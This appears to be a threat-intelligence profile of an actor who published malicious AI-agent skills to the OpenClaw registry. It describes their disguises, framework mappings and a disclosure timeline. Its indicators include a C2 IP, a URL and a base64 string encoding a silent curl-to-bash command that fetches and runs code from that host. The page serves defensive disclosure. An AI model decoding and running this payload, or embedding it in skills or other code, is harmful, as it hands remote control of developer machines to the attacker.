Skip to content
Home/Threat Feed/sakaen736jih
Threat Actor Profile

sakaen736jih

Active198 / 212 malicious (93%)·First seen 2026-04-11

The most technically direct actor of the three. Ships skills with base64-encoded curl-to-bash payloads that call back to C2 server 91.92.242.30 for arbitrary command execution.

Overview
First seen
2026-04-11
Last activity
2026-04-14
Skills published
212
Malicious ratio
198 / 212 (93%)
Primary motive
Remote code execution via C2 callback; arbitrary command-and-control over compromised developer machines
Geography
C2 infrastructure at 91.92.242.30 — no attribution to specific region
Tactics, Techniques & Procedures
Disguises
  • Image generation tools (e.g. "Nano Banana Pro")
  • Generic agent browser skills
Payload mechanisms
  1. 01Base64-encoded shell command that decodes to a curl-to-bash C2 callback. The -fsSL flags suppress all output, so execution is invisible to the user.
Indicators of Compromise
C2 servers
  • 91.92.242.30
URLs
  • http://91.92.242.30/tjjve9itarrd3txw
Naming patterns
  • agent-browser-*
Base64 samples
L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=

Decode with `echo "..." | base64 -d` in an isolated environment to recover the raw payload.

Related ATR Rules
ATR-2026-00121

Click a rule ID for the full YAML definition, attack samples, and documented evasion techniques.

Framework Mappings
MITRE ATLAS
AML.T0010 · ML Supply Chain Compromise
OWASP LLM 2025
  • LLM03 — Supply Chain Vulnerabilities
OWASP Agentic 2026
  • ASI04 — Supply Chain Compromise
  • ASI05 — Unexpected Code Execution
OWASP AST 2026
  • AST01 — Malicious Skills
  • AST02 — Supply Chain Compromise
Affected Registries
OpenClaw
212
malicious skills
Timeline
  1. 2026-04-10
    Initial scan of OpenClaw registry initiated.
  2. 2026-04-11
    First detection of coordinated malicious publishers.
  3. 2026-04-12
    Full scan of 96,096 skills completed across five sources.
  4. 2026-04-13
    Analysis and actor profiling completed.
  5. 2026-04-14
    Research report published; NousResearch notified via issue #9809.
Report Status
← Back to threat feed